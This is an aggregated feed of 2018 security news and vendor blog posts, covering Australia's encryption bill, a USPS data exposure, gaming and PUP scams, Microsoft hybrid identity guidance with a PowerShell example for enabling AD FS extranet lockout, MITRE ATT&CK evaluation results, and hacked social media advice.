On Thursday, the Australian Parliament unanimously passed the most controversial Bill of the year, The Access and Assistance Bill, 2018,

Australia Now Has an Encryption Bill, Labor Party Drops Suggestions on Latest Hacking News.

Australia Passes Anti-Encryption Bill—Here’s Everything You Need To Know

Australia's House of Representatives has finally passed the "Telecommunications Assistance and Access Bill 2018," also known as the Anti-Encryption Bill, on Thursday that would now allow law enforcement to force Google, Facebook, WhatsApp, Signal, and other tech giants to help them access encrypted communications. The Australian government argues the new legislation is important for national

December Patch Tuesday forecast: Let it snow, let it snow, let it snow

Grab your shovels, dust off the snow blower, and bundle up. The way patches are accumulating this month is making me think of winter in Minnesota. I’m talking about the kind where the snow flurries start and stop so many times over the course of a few weeks, you suddenly realize there is a lot of snow out there! So the question is, do you shovel in small amounts when there are breaks in the … More

The post December Patch Tuesday forecast: Let it snow, let it snow, let it snow appeared first on Help Net Security.

Half of management teams lack awareness about BPC despite increased attacks

Trend Micro revealed that 43 percent of surveyed organizations have been impacted by a Business Process Compromise (BPC). Despite a high incidence of these types of attacks, 50 percent of management teams still don’t know what these attacks are or how their business would be impacted if they were victimized. Most popular filename categories used in malicious attachments (based on VirusTotal samples) In a BPC attack, criminals look for loopholes in business processes, vulnerable systems … More

The post Half of management teams lack awareness about BPC despite increased attacks appeared first on Help Net Security.

US Postal Service exposed the details of 60 million people

A few weeks ago the United States Postal Service (USPS) patched up a vulnerability that has been revealing the details of sixty million people, predominantly US residents, over the last year. About a year ago an anonymous cybersecurity researcher tipped off the Post Office about the vulnerability, but USPS failed to address the issue. After a long wait, the cybersecurity expert had no other choice but to inform the media about the problem hoping that public attention would prompt a reaction from the independent agency of the United States government. As soon as the security flaw became public, the Postal Service patched the vulnerability.

The cybersecurity flaw affected the personal details of people who have signed up for USPS’ Informed Visibility service. As you might already know, Informed Delivery is a service that provides end-to-end mail tracking information for letter and flat pieces, bundles, handling units, and containers. The API exploit enabled anyone with basic IT knowledge and a username and a password to export information about other users. This includes private information such as usernames, account numbers, physical addresses, email addresses, phone numbers, authorized users and additional information. Currently, there is no evidence confirming that sensitive information such as account passwords, banking details, or social security numbers may have been exposed.

In a statement to the media, a Postal Service representative said that USPS currently has no information that this security flaw was ever used for criminal purposes but is continuing the investigation. Their goal is to ensure that anyone who might have sought to access their systems inappropriately is pursued to the fullest extent of the law. Asked why USPS took a whole year to deal with the reported issue, the USPS spokesperson said they currently do not have evidence that the cybersecurity expert reached out to them in 2017.

USPS has been under fire in the past too; the independent government agency exposed personal details of almost all USPS employees in a hack back in 2014. The hack included workers’ compensation records of nearly 500,000 people and approximately 3 million customer-inquiry records. 2018 is not going well either: apart from being constantly dragged into the fight between President Trump and Amazon’s Jeff Bezos, in August the U.S. Postal Service had to apologize to Democratic congressional candidate and former CIA operative Abigail Spanberger for accidentally releasing her records to a Republican super PAC.

The post US Postal Service exposed the details of 60 million people appeared first on Panda Security Mediacenter.

Attention Red Dead Redemption 2 Players: Dodge This New Download Scam

Rockstar Games’ Red Dead Redemption 2 has struck a popular chord with many online gamers. Unfortunately, the Western-themed action-adventure game has also become a popular vessel for malicious activity among cybercriminals as well. Scammers are tricking gamers into giving up their personal information with phony “free” downloads of the online game, while simultaneously making a profit on these downloads.

You’re probably wondering how exactly this scam works. It first begins with cybercriminals planting their phony download traps in ads on platforms like YouTube, Twitter, and blog postings. With other, less sophisticated scams, a user would be prompted to install several bundled applications at this point, each one generating revenue for the scammer. But this scheme works a little bit differently. When the user clicks on the “download” button, they are presented with a fake install screen showing the progression of the game’s download process.  The fake install takes about an hour to complete, further giving the illusion that a large file is actually being downloaded on the user’s device.

Once the fake installation is complete, the user is asked to enter a nonexistent license key (a pattern of numbers and/or letters provided to licensed users of a software program). If a user clicks on one of the buttons on this screen, they are redirected to a website asking for human verification in the form of surveys and questionnaires. These surveys trick the user into divulging their personal information for the cybercriminal’s disposal. What’s more, the scammer earns revenue for their malicious acts.

Because this scheme tricks users into handing over their personal information, it affects a victim’s overall privacy. Luckily, there are steps users can take to combat this threat:

  • Browse with caution. Many scammers target gamers through popular websites like YouTube and Twitter to push out malicious content. Use discretion when browsing these websites.
  • Only download content from trusted sources. If you come across a download offer that seems too good to be true, it probably is. Only download software from legitimate sources and avoid sites if you can’t tell whether they are trustworthy or not.
  • Use security software to browse the internet. Sometimes, it can be hard to distinguish whether a site is malicious or not. Security solutions like McAfee WebAdvisor can detect the URLs and scam installers associated with this threat.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention Red Dead Redemption 2 Players: Dodge This New Download Scam appeared first on McAfee Blogs.

CISO series: Strengthen your organizational immune system with cybersecurity hygiene

One of the things I love about my job is the time I get to spend with security professionals, learning firsthand about the challenges of managing security strategy and implementation day to day. There are certain themes that come up over and over in these conversations. My colleague Ken Malcolmson and I discussed a few of them on the inaugural episode of the Microsoft CISO Spotlight Series: CISO Lessons Learned. Specifically, we talked about the challenges CISOs face migrating to the cloud and protecting your organization’s data. In this blog, I dig into one of the core concepts we talked about: practicing cybersecurity hygiene.

Hygiene means conditions or practices conducive to maintaining health. Cybersecurity hygiene is about maintaining cyberhealth by developing and implementing a set of tools, policies, and practices to increase your organization’s resiliency in the face of attacks and exploits. Healthy habits like drinking lots of water, walking every day, and eating a rainbow of vegetables build up the immune system, so our bodies can fight off viruses with minimal downtime. Most of the time we don’t even realize how powerful the protection of these behaviors is until that day deep in January when you look around your office and realize you are one of the only people who isn’t sick. That’s what cybersecurity hygiene does; it strengthens your organizational immune system. It’s a simple concept until you start thinking about the last time you resolved to start practicing healthy habits but were skipping the salad by day three because big salads make your stomach bloat and you’d rather have a candy bar anyway.

Success starts with strategy

No matter where in the world I am, CSOs and CISOs tell me their days are filled with fire drills and crises that consume attention and resources but don’t help advance a strategic agenda. A little like that candy bar, drawing focus in the present but diverting energy from long-term goals. In the precious moments of downtime, when cyber executives can turn attention to long-term strategy and proactive security measures, it’s not uncommon to have those goals diverted in a different way: chasing the latest trend that the board is excited about or having to react to a failure or a finding from a recent security assessment.

Consistent change changes systems

Our bodies are systems: when we eat more vegetables our microbiome changes, it becomes easier to digest those veggies, and we can actually begin craving them. But if you stock the pantry with candy instead of leafy greens, it’s hard to make a consistent change. For cyberhealth, you need a strategy that works with the strengths of your organization and mitigates its weaknesses. It’s a little like planning to be healthy. If you are social, it can help to enlist a friend in your exercise routine. If you work late, you can buy prepared, healthy food, so you aren’t as tempted to grab that candy bar after a long day.

To implement good security practices, take some time to understand your budget, your priorities, and your greatest vulnerabilities and allocate your money appropriately. Create strategic cybersecurity targets and goals for the next one, three, and five years and engage the C-Suite and board in the approvals. You will feel more empowered in conversations with the C-Suite when you have a good rationale and a solid plan and when cybersecurity hygiene becomes a systemic part of the organization, the healthy system will start to crave it.

Practice good cybersecurity hygiene

Once you have a strategy, you are ready to institute some best practices. We recommend getting started with the following to all our clients, big and small:

  • Back up data: Make sure you have a regular process to back up your data to a location separate from your production data and encrypt it in transit and at rest.
  • Implement identities: A good identity and access management solution allows you to enable a single common identity across on-premises and cloud resources with added safeguards to protect your most privileged accounts.
  • Deploy conditional access: Use conditional access to control access based on location, device, or other risk factors.
  • Use Multi-Factor Authentication: Multi-Factor Authentication works on its own or in conjunction with conditional access to verify that users trying to access your resources are who they say they are.
  • Patching: A strategy to ensure all of your software and hardware is regularly patched and updated is important to reduce the number of security vulnerabilities that a hacker can exploit.

Develop cybersecurity hygiene with industry security frameworks

Excited to build healthy cyber habits but not sure where to start? The National Institute of Standards and Technology (NIST) Cybersecurity Framework is a great place to start. You can also download blueprints that will help you implement Microsoft Azure according to NIST standards.

The Center for Information Security (CIS) is a non-profit organization that helps organizations protect themselves from cybercrime. Review the CIS Microsoft Azure Foundations benchmark, which provides recommended steps to securely implement Azure.

Stay healthy, eat your cyber vegetables, and stay up to date by watching our Microsoft CISO Spotlight Series: CISO Lessons Learned, and your organization can build the resiliency to take on any threat.

The post CISO series: Strengthen your organizational immune system with cybersecurity hygiene appeared first on Microsoft Secure.

Radware Blog: Growing Your Business: Millennials and M-Commerce

Millennials are the largest generation in the U.S. labor force—a position they’ve held since 2016—and they’re involved in the majority (73%) of B2B purchasing decisions. Raised in the age of the Internet, they’re digital natives and easily adopt and adapt to new technologies. And mobile apps are their lifelines. Why does this matter? Well, when […]

The post Growing Your Business: Millennials and M-Commerce appeared first on Radware Blog.

An introduction to deception technology

This article is first in a five-part series being developed by Dr. Edward Amoroso in conjunction with the deception technology team from Attivo Networks. The article provides an overview of the evolution of deception, including its use in the enterprise, with emphasis on the practical requirements that have emerged in recent years to counter the growing number and nature of malicious threats. Purpose of deception for cyber The idea of modern deception in cyber security … More

The post An introduction to deception technology appeared first on Help Net Security.

Measuring privacy operations: Use of technology on the rise

Critical privacy program activities such as creating data inventories, conducting data protection impact assessments (DPIA), and managing data subject access rights requests (DSAR) are now well established in large and small organizations in both Europe and the United States, according to TrustArc and the International Association of Privacy Professionals (IAPP). “Among our thousands of members, we know that privacy teams are now reporting on a regular basis to company leadership, and consequently they need to … More

The post Measuring privacy operations: Use of technology on the rise appeared first on Help Net Security.

Consumers believe social media sites pose greatest risk to data

A majority of consumers are willing to walk away from businesses entirely if they suffer a data breach, with retailers most at risk, according to Gemalto. Two-thirds (66%) are unlikely to shop or do business with an organisation that experiences a breach where their financial and sensitive information is stolen. Retailers (62%), banks (59%), and social media sites (58%) are the most at risk of suffering consequences with consumers prepared to use their feet. Surveying … More

The post Consumers believe social media sites pose greatest risk to data appeared first on Help Net Security.

Microsoft Secure: Step 1. Identify users: top 10 actions to secure your environment

This series outlines the most fundamental steps you can take with your investment in Microsoft 365 security solutions. We’ll provide advice on activities such as setting up identity management through Active Directory, malware protection, and more. In this post, we explain how to create a single common identity across on-premises and cloud with hybrid authentication.

Establishing a single, common identity for each user is the foundational step of your cybersecurity strategy. If you currently have an on-premises footprint, this means connecting your Azure Active Directory (Azure AD) to your on-premises resources. There are various requirements and circumstances that will influence the hybrid identity and authentication method that you choose, but whether you choose federation or cloud authentication, there are important security implications for each that you should consider. This blog walks you through our recommended security best practices for each hybrid identity method.

Set up password hash synchronization as your primary authentication method when possible

Azure AD Connect allows your users to access on-premises resources including Azure, Office 365, and Azure AD-integrated SaaS apps using one identity. It uses your on-premises Active Directory as the authority, so you can use your own password policy, and Azure AD Connect gives you visibility into the types of apps and identities that are accessing your company resources. If you choose Azure AD Connect, Microsoft recommends that you enable password hash synchronization (Figure 1) as your primary authentication method. Password hash synchronization synchronizes the password hash in your on-premises Active Directory to Azure AD. It authenticates in the cloud with no on-premises dependency, simplifying your deployment process. It also allows you to take advantage of Azure AD Identity Protection, which will alert you if any of the usernames and passwords in your organization have been sold on the dark web.

Figure 1. Password hash sync synchronizes the password hash in your on-premises Active Directory to Azure AD.

Enable password hash synchronization as a backup during on-premises outages

If your authentication requirements are not natively supported by password hash synchronization, another option available through Azure AD Connect is pass-through authentication (Figure 2). Pass-through authentication provides a simple password validation for Azure AD authentication services by using a software agent that runs on one or more on-premises servers. Since pass-through authentication relies on your on-premises infrastructure, your users could lose access to both Active Directory-connected cloud resources and on-premises resources if your on-premises environment goes down. To limit user downtime and loss of productivity, we recommend that you configure password hash synchronization as a backup. This allows your users to sign in and access cloud resources during an on-premises outage. It also gives you access to advanced security features, like Azure AD Identity Protection.

Figure 2. Pass-through authentication provides a simple password validation for Azure AD authentication services.

Whether you implement password hash synchronization as your primary authentication method or as a backup during on-premises outages, you can use the Active Directory Federation Services (AD FS) to password hash sync deployment plan as a step-by-step guide to walk you through the implementation process.

Implement extranet lockout if you use AD FS

AD FS may be the right choice if your organization requires on-premises authentication or if you are already invested in federation services (Figure 3). Federation services authenticates users and connects to the cloud using an on-premises footprint that may require several servers. To ensure your users and data are as secure as possible, we recommend two additional steps.

First, enable password hash synchronization as a backup authentication method to get access to Azure AD Identity Protection and minimize interruptions if an outage should occur. Second, we recommend you implement extranet lockout. Extranet lockout protects against brute force attacks that target AD FS, while preventing users from being locked out of Active Directory. If you are using AD FS running on Windows Server 2016, set up extranet smart lockout. For AD FS running on Windows Server 2012 R2, you’ll need to turn on extranet lockout protection.

Figure 3. Federation services authenticates users and connects to the cloud using an on-premises footprint.

You can use the AD FS to pass-through authentication deployment plan as a step-by-step guide to walk you through the implementation process.
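To make the extranet lockout step above concrete, the following is an added PowerShell example (not code from the Microsoft Secure post) showing how the setting is inspected and enabled on an AD FS farm with the built-in ADFS module. The threshold and observation window values are assumptions for illustration; the one design rule that matters is to keep the AD FS threshold below the on-premises Active Directory account lockout threshold, so that AD FS blocks the extranet flood before the domain account itself is locked.

```powershell
# Added example: enable AD FS extranet lockout. Run in an elevated PowerShell
# session on the primary AD FS server. Threshold/window values are assumptions;
# set ExtranetLockoutThreshold lower than the AD account lockout threshold.

Import-Module ADFS

# 1. Record the current state before changing anything.
Get-AdfsProperties | Select-Object EnableExtranetLockout, ExtranetLockoutMode,
    ExtranetLockoutThreshold, ExtranetObservationWindow, ExtranetLockoutRequirePDC

# 2a. Windows Server 2016 (with the update that added extranet smart lockout):
#     start in log-only mode so you can review familiar/unfamiliar location
#     decisions in the AD FS audit log before enforcing.
Set-AdfsProperties -EnableExtranetLockout $true `
    -ExtranetLockoutMode ADFSSmartLockoutLogOnly `
    -ExtranetLockoutThreshold 10 `
    -ExtranetObservationWindow (New-TimeSpan -Minutes 30)

# The mode change is picked up after the AD FS service restarts.
Restart-Service adfssrv

# Once the log-only output looks sane, switch to enforcement:
# Set-AdfsProperties -ExtranetLockoutMode ADFSSmartLockoutEnforce
# Restart-Service adfssrv

# 2b. Windows Server 2012 R2: classic extranet lockout has no smart mode, so
#     only the enable flag, threshold and observation window apply.
# Set-AdfsProperties -EnableExtranetLockout $true `
#     -ExtranetLockoutThreshold 10 `
#     -ExtranetObservationWindow (New-TimeSpan -Minutes 30)

# 3. Verify the change took effect.
Get-AdfsProperties | Select-Object EnableExtranetLockout, ExtranetLockoutMode,
    ExtranetLockoutThreshold, ExtranetObservationWindow
```

Because extranet lockout only counts failures that arrive through the Web Application Proxy, internal sign-ins keep working while the threshold is tripped from outside, which is what gives it the "protect AD FS without locking users out of Active Directory" property the post describes.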

Learn more

Check back in a few weeks for our next blog post, Step 2. Manage authentication and safeguard access. In this post we’ll dive into additional protections you can apply to your identities to ensure that only authorized people access the appropriate data and apps.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.

Resources

The post Step 1. Identify users: top 10 actions to secure your environment appeared first on Microsoft Secure.



Microsoft Secure

Step 1. Identify users: top 10 actions to secure your environment

This series outlines the most fundamental steps you can take with your investment in Microsoft 365 security solutions. Well provide advice on activities such as setting up identity management through active directory, malware protection, and more. In this post, we explain how to create a single common identity across on-premises and cloud with hybrid authentication.

Establishing a single, common identity for each user is the foundations step to your cybersecurity strategy. If you currently have an on-premises footprint, this means connecting your Azure Active Directory (Azure AD) to your on-premises resources. There are various requirements and circumstances that will influence the hybrid identity and authentication method that you choose, but whether you choose federation or cloud authentication, there are important security implications for each that you should consider. This blog walks you through our recommended security best practices for each hybrid identity method.

Set up password hash synchronization as your primary authentication method when possible

Azure AD Connect allows your users to access on-premises resources including Azure, Office 365, and Azure AD-integrated SaaS apps using one identity. It uses your on-premises Active Directory as the authority, so you can use your own password policy, and Azure AD Connect gives you visibility into the types of apps and identities that are accessing your company resources. If you choose Azure AD Connect, Microsoft recommends that you enable password hash synchronization (Figure 1) as your primary authentication method. Password hash synchronization synchronizes the password hash in your on-premises Active Directory to Azure AD. It authenticates in the cloud with no on-premises dependency, simplifying your deployment process. It also allows you to take advantage of Azure AD Identity Protection, which will alert you if any of the usernames and passwords in your organization have been sold on the dark web.

Figure 1. Password hash sync synchronizes the password hash in your on-premises Active Directory to Azure AD.

Enable password hash synchronization as a backup during on-premises outages

If your authentication requirements are not natively supported by password hash synchronization, another option available through Azure AD Connect is pass-through authentication (Figure 2). Pass-through authentication provides a simple password validation for Azure AD authentication services by using a software agent that runs on one or more on-premises servers. Since pass-through authentication relies on your on-premises infrastructure, your users could lose access to both Active Directory-connected cloud resources and on-premises resources if your on-premises environment goes down. To limit user downtime and loss of productivity, we recommend that you configure password hash synchronization as a backup. This allows your users to sign in and access cloud resources during an on-premises outage. It also gives you access to advanced security features, like Azure Directory Identity Protection.

Figure 2. Pass-through authentication provides a simple password validation for Azure AD authentication services.

Whether you implement password hash synchronization as your primary authentication method or as a backup during on-premises outages, you can use the Active Directory Federation Services (AD FS) to password hash sync deployment plan as a step-by-step guide to walk you through the implementation process.

Implement extranet lockout if you use AD FS

AD FS may be the right choice if your organization requires on-premises authentication or if you are already invested in federation services (Figure 3). Federation services authenticates users and connects to the cloud using an on-premises footprint that may require several servers. To ensure your users and data are as secure as possible, we recommend two additional steps.

First, enable password hash synchronization as a backup authentication method to get access to Azure AD Identity Protection and minimize interruptions if an outage should occur. Second, we recommend you implement extranet lockout. Extranet lockout protects against brute force attacks that target AD FS, while preventing users from being locked out of Active Directory. If you are using AD FS running on Windows Server 2016, set up extranet smart lockout. For AD FS running on Windows Server 2012 R2AD, youll need to turn on extranet lockout protection.

Figure 3. AD FS authenticates users and connects to the cloud using an on-premises footprint.

You can use the AD FS to pass-through authentication deployment plan as a step-by-step guide to walk you through the implementation process.

Learn more

Check back in a few weeks for our next blog post, Step 2. Manage authentication and safeguard access. In this post we'll dive into additional protections you can apply to your identities to ensure that only authorized people access the appropriate data and apps.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.

The post Step 1. Identify users: top 10 actions to secure your environment appeared first on Microsoft Secure.

Situational awareness: Real-time decision making to improve business operations

Although the term situational awareness usually pertains to the military and first responder space, it also plays a crucial role in the efficiency of public and private organizations such as large-scale businesses, government agencies, transportation and logistics, and many other industries. For business leaders, situational awareness has come to mean having real-time visibility into operations in order to understand and control the business on a day-to-day basis. This allows entire teams to understand how their … More

The post Situational awareness: Real-time decision making to improve business operations appeared first on Help Net Security.

Major flaws uncovered in leading IoT protocols

Trend Micro warned organizations to revisit their operational technology (OT) security after finding major design flaws and vulnerable implementations related to two popular machine-to-machine (M2M) protocols, Message Queuing Telemetry Transport (MQTT) and Constrained Application Protocol (CoAP).

A high-level view of the interaction models of MQTT (left) and CoAP (right)

The insecurity of IIoT's data backbone

Trend Micro's new report, co-branded with Politecnico di Milano, The Fragility of Industrial IoT's Data Backbone, highlights the growing threat … More

The post Major flaws uncovered in leading IoT protocols appeared first on Help Net Security.

80% of enterprises struggle to protect machine identities

A study conducted by Forrester Consulting examined the views of 116 IT security professionals from financial services and insurance organizations in the U.S., U.K., Germany, France and Australia. A key finding from the study reveals that eighty percent of financial services respondents who are responsible for identity and access management (IAM) believe automated communications between machines on their organizations’ networks are mostly or completely secure. Seventy-one percent of respondents believe effective protection of machine identities … More

The post 80% of enterprises struggle to protect machine identities appeared first on Help Net Security.

Hey Belfast, Imperva’s Moving Into The Neighborhood

As a local, I’m very excited to be Imperva’s first Belfast hire, in charge of spinning up the operation in our new European location.

Imperva provides best-in-class data and application security solutions on premises, in the cloud, and in hybrid environments. As we position ourselves for the next phase of our growth, it makes sense that we do this on an increasingly international level.

And what better place to take the next step, than Northern Ireland? With its growing wealth of cybersecurity talent, proximity to the U.S. and the rest of Europe and educational caliber, the move to Belfast feels very natural.

Positioned in a center of technological talent, our Belfast office will benefit from local educational institutions such as Queen’s University and Ulster University as well as the skills and professional experience of the local workforce. The investment in Northern Ireland will allow Imperva to tap into international resources and join the ranks of other cybersecurity companies expanding their presence in Belfast.

Tapping into the local job market

With the support of Invest Northern Ireland, Imperva is committed to creating 220 local jobs over a three to five year period, providing invaluable expertise and experience with Imperva’s cutting edge technologies.

Initial hiring is focused on openings in customer success — tech support, customer success management, and managed services — as well as product development — site reliability, full-stack Java engineers and security researchers — across a range of experience levels, from those who have recently graduated from relevant University courses to seasoned IT professionals.  

The Belfast location affords Imperva the opportunity to build our brand and enhance our global customers’ experience as we deliver compelling, comprehensive solutions to keep customers’ data and applications safe from cybercriminals. We’re excited to be in Belfast and are very much looking forward to playing an active role in the local technology ecosystem.

The post Hey Belfast, Imperva’s Moving Into The Neighborhood appeared first on Blog.

Why hospitals are the next frontier of cybersecurity

Hospital cybersecurity is a pressing problem with unique challenges and incalculable stakes. The healthcare industry’s accelerating adoption of sophisticated networks, connected devices and digital records has revolutionized clinical operations and patient care but has also left modern hospitals acutely vulnerable to cyber attack. Recent high-profile hacks have brought these mounting threats sharply into focus. However, despite increasing efforts and awareness, a number of technological, cultural and regulatory issues complicate healthcare cybersecurity. Security solutions built for … More

The post Why hospitals are the next frontier of cybersecurity appeared first on Help Net Security.

Hardware is on its way out as the demand for SD-WAN climbs

In today’s world applications are moving to the cloud and employee mobility is on the rise, which adds unprecedented flexibility and agility. However, this drive towards digital transformation means that businesses are faced with navigating the myriad network infrastructure and security challenges on their way to making the internet the new corporate network. Gartner projected the worldwide public cloud services market to grow 21.4 percent in 2018. This rapid proliferation of cloud services and software-as-a-service … More

The post Hardware is on its way out as the demand for SD-WAN climbs appeared first on Help Net Security.

Software Company WakeNet AB Discovered Spreading PUPs to Users

Pay-per-install, or PPI for short, is a type of software program that presents users with third-party offers while they are in the middle of another download. If a user clicks on the third-party advertisement, the software developer earns money from the download. One specific PPI program has caught the attention of our McAfee ATR team, as they recently investigated a company that has taken advantage of this software and is using deceptive techniques to spread malicious files. Meet WakeNet AB, a Swedish pay-per-install software developer that has generated a large amount of revenue – even more so than some of the most prevalent ransomware families – from spreading PUPs (potentially unwanted programs).

So, how does WakeNet AB infect users’ devices with PUPs? WakeNet sets up PPI sites to entice affiliate hackers to spread malicious files and adware. WakeNet’s most recent distribution vessel is the site FileCapital. FileCapital provides affiliate hackers with a variety of “marketing tools” such as embedded movies, landing pages, banners, and buttons. These deceptive tools are intended to coax victims into installing bundled applications that house different PUPs. Victims may install these applications because they are disguised as legitimate programs. For example, a user may think they are installing a helpful performance cleaner onto their computer. What they don’t know is that the “performance cleaner” is actually disguising other malicious files that could lead to irritating adverts and decreased computer performance.

As of now, it seems unlikely that PUP development will slow since it helps their distributors earn a considerable amount of money. With that said, it’s important now more than ever for users to be aware of the security risks involved with PUPs like the ones spread by WakeNet’s FileCapital. Check out the following tips to better protect yourself from this threat:

  • Click with caution. Be wary of pop-ups and websites asking you to click on items like movie playbacks and other software downloads. These items could infect your device with annoying adverts and malware.
  • Only download software from trusted sources. If you receive a pop-up asking you to update or install software, be vigilant. Adware and PUPs are often disguised as legitimate sites or software companies. Your best bet is to play it safe and go directly to the source when updating or installing new software.
  • Use robust security software. Using a security solution like McAfee Total Protection could help protect your device from exposure to PUPs that have been spread by WakeNet's FileCapital. McAfee Total Protection blocks auto-play videos on websites that decrease computer performance and warns you of risky websites and links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Software Company WakeNet AB Discovered Spreading PUPs to Users appeared first on McAfee Blogs.

Insights from the MITRE ATT&CK-based evaluation of Windows Defender ATP

In MITRE's evaluation of endpoint detection and response solutions, Windows Defender Advanced Threat Protection demonstrated industry-leading optics and detection capabilities. The breadth of telemetry, the strength of threat intelligence, and the advanced, automatic detection through machine learning, heuristics, and behavior monitoring delivered comprehensive coverage of attacker techniques across the entire attack chain.

MITRE tested the ability of products to detect techniques commonly used by the targeted attack group APT3 (also known as Boron or UPS). To isolate detection capabilities, all protection and prevention features were turned off as part of the testing. In the case of Windows Defender ATP, this meant turning off blocking capabilities like hardware-based isolation, attack surface reduction, network protection, exploit protection, controlled folder access, and next-gen antivirus. The test showed that, by itself, Windows Defender ATP's EDR component is one of the most powerful detection and investigation solutions in the market today.

Microsoft is happy to be one of the first EDR vendors to sign up for the MITRE evaluation based on the ATT&CK framework, widely regarded today as the most comprehensive catalog of attacker techniques and tactics. MITRE closely partnered with participating security vendors in designing and executing the evaluation, resulting in a very collaborative and productive testing process.
We like participating in scientific and impartial tests because we learn from them. Learning from independent tests, like listening to customers and conducting our own research, is part of our goal to make sure that Windows Defender ATP is always ahead of threats and continues to evolve.

Overall, the results of the MITRE evaluation validated our investments in continuously enriching Windows Defender ATP's capabilities to detect and expose attacker techniques. Below we highlight some of the acute attacker techniques that Windows Defender ATP effectively detected during the MITRE testing.

Deep security telemetry and comprehensive coverage

Windows Defender ATP showed exceptional capabilities for detecting attacker techniques through APT3's attack stages, registering the lowest number of misses among evaluated products. Throughout the emulated attack chain, Windows Defender ATP detected the most critical attacker techniques, including:

  • Multiple discovery techniques (detected with Suspicious sequence of exploration activities alert)
  • Multiple process injection attempts for privilege escalation, credential theft, and keylogging/screen capture
  • Rundll32.exe being used to execute malware
  • Credential dumping from LSASS
  • Persistence via Scheduled Task
  • Keylogging (both in Cobalt Strike and PS Empire)
  • Brute force login attempts
  • Accessibility features attack (abusing sticky keys)
  • Lateral movement via remote service registration

Windows Defender ATP correlates security signals across endpoints and identities. In the case of the APT3 emulation, signals from Azure Advanced Threat Protection helped expose and enrich the detection of the account discovery behavior. This validates the strategic approach behind Microsoft Threat Protection: the most comprehensive protection comes from sharing rich telemetry collected from across the entire attack chain.

Windows Defender ATP's Antimalware Scan Interface (AMSI) sensors also proved especially powerful, providing rich telemetry on the latter stages of the attack emulation, which made heavy use of malicious PowerShell scripts. This test highlighted the value of transparency: the AMSI interface enabled deep visibility into the PowerShell used in each attacker technique. Advanced machine learning-based detection capabilities in Windows Defender ATP use this visibility to expose malicious scripts.

Stopping attacks in the real world with Windows Defender ATP's unified endpoint security platform

The MITRE results represent EDR detection capabilities, which surface malicious and other anomalous activities. In actual customer environments, Windows Defender ATP's preventive capabilities, like attack surface reduction and next-gen protection, would have blocked many of the attack techniques at the onset. In addition, investigation and hunting capabilities enable security operations personnel to correlate alerts and incidents to enable holistic response actions and build wider protections.

Windows Defender ATP's best-in-class detection capabilities, as affirmed by MITRE, are amplified across Microsoft solutions through Microsoft Threat Protection, a comprehensive, integrated protection for identities, endpoints, user data, cloud apps, and infrastructure. To run your own evaluation of how Windows Defender ATP can help protect your organization and let you detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.


Windows Defender ATP team

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Insights from the MITRE ATT&CK-based evaluation of Windows Defender ATP appeared first on Microsoft Secure.

PewDiePie Fan Hacks 50,000 Printers to Keep the Channel No.1

In a recent effort to earn more subscribers for Felix Kjellberg’s channel ‘Pewdiepie’, a self-proclaimed Pewdiepie fan hacked over 50,000

PewDiePie Fan Hacks 50,000 Printers to Keep the Channel No.1 on Latest Hacking News.

Kicking off the Microsoft Graph Security Hackathon

Cybersecurity is one of the hottest sectors in tech, with Gartner predicting worldwide information security spending to reach $124 billion by the end of 2019. New startups and security solutions are coming onto the market while attackers continue to find new ways to breach systems. The security solutions market has grown at a rapid pace as a result. Our customers face immense challenges in integrating all these different solutions, tools, and intelligence. Oftentimes, the number of disconnected solutions makes it more difficult, rather than easier, to defend against and recover from attacks.

We invite you to participate in the Microsoft Graph Security Hackathon for a chance to help solve this pressing challenge and win a piece of the $15,000 cash prize pool.* This online hackathon runs from December 1, 2018 to March 1, 2019 and is open to individuals, teams, and organizations globally.

The Microsoft Graph Security API offers a unified REST endpoint that makes it easy for developers to bring security solutions together to streamline security operations and improve cyber defenses and response. Tap into other Microsoft Graph APIs as well as mash up data and APIs from other sources to extend or enrich your scenarios.

Prizes

In addition to learning more about the Microsoft Graph and the security API, the hackathon offers these awesome prizes for the top projects:

  • $10,000 cash prize for the first-place solution, plus a speaking opportunity at Build 2019.
  • $3,000 cash prize for the runner up solution.
  • $2,000 cash prize for the popular choice solution, chosen via public voting.

In addition, all three winning projects, and the individuals or teams in the categories above, will be widely promoted on Microsoft blog channels, giving you the opportunity for your creative solutions to be known to the masses. The judging criteria will consist of the quality of the idea, value to the enterprise, and technical implementation. You can find all the details you need on the Microsoft Graph Security Hackathon website.

Judging panel

Once the hackathon ends on March 1, 2019, judging commences immediately. We'll announce the winners on or before April 1, 2019. The hackathon will be judged by a panel of Microsoft and non-Microsoft experts and influencers in the developer community and in cybersecurity, including:

  • Ann Johnson, Corporate Vice President for Cybersecurity Solutions Group for Microsoft
  • Scott Hanselman, Partner Program Manager for Microsoft
  • Mark Russinovich, CTO Azure for Microsoft
  • Rick Howard, Chief Security Officer Palo Alto Networks

We will announce more judges in the coming weeks!

Next steps

Let the #graphsecurityhackathon begin

*No purchase necessary. Open only to new and existing Devpost users who are the age of majority in their country. Game ends March 1, 2019 at 5:00 PM Eastern Time. For details, see the official rules.

The post Kicking off the Microsoft Graph Security Hackathon appeared first on Microsoft Secure.

What To Do When Your Social Media Account Gets Hacked

You log in to your favorite social media site and notice a string of posts or messages definitely not posted by you. Or, you get a message that your account password has been changed, without your knowledge. It hits you that your account has been hacked. What do you do?

This is a timely question considering that social media breaches have been on the rise. A recent survey revealed that 22% of internet users said that their online accounts have been hacked at least once, while 14% reported they were hacked more than once. And, earlier this year Facebook itself got hacked, exposing the identity information of 50 million users.

Your first move—and a crucial one—is to change your password right away, and notify your connections that your account has been hacked. This way your friends know not to click on any suspicious posts or messages that appear to be coming from you because they might contain malware or phishing attempts. But that’s not all. There may be other, hidden threats to having your social media account hacked.

The risks associated with a hacker poking around your social media have a lot to do with how much personal information you share. Does your account include personal information that could be used to steal your identity, or guess your security questions on other accounts?
